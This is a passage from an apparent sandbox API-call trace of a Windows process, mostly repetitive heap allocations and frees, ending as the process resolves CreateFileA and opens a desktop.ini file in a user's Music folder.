dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.955] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0180.955] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.959] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.962] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd498 [0180.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd498, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0180.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.963] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0180.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.963] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0180.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0180.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", cchWideChar=48, lpMultiByteStr=0x9bf310, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpUsedDefaultChar=0x0) returned 48 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.964] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: 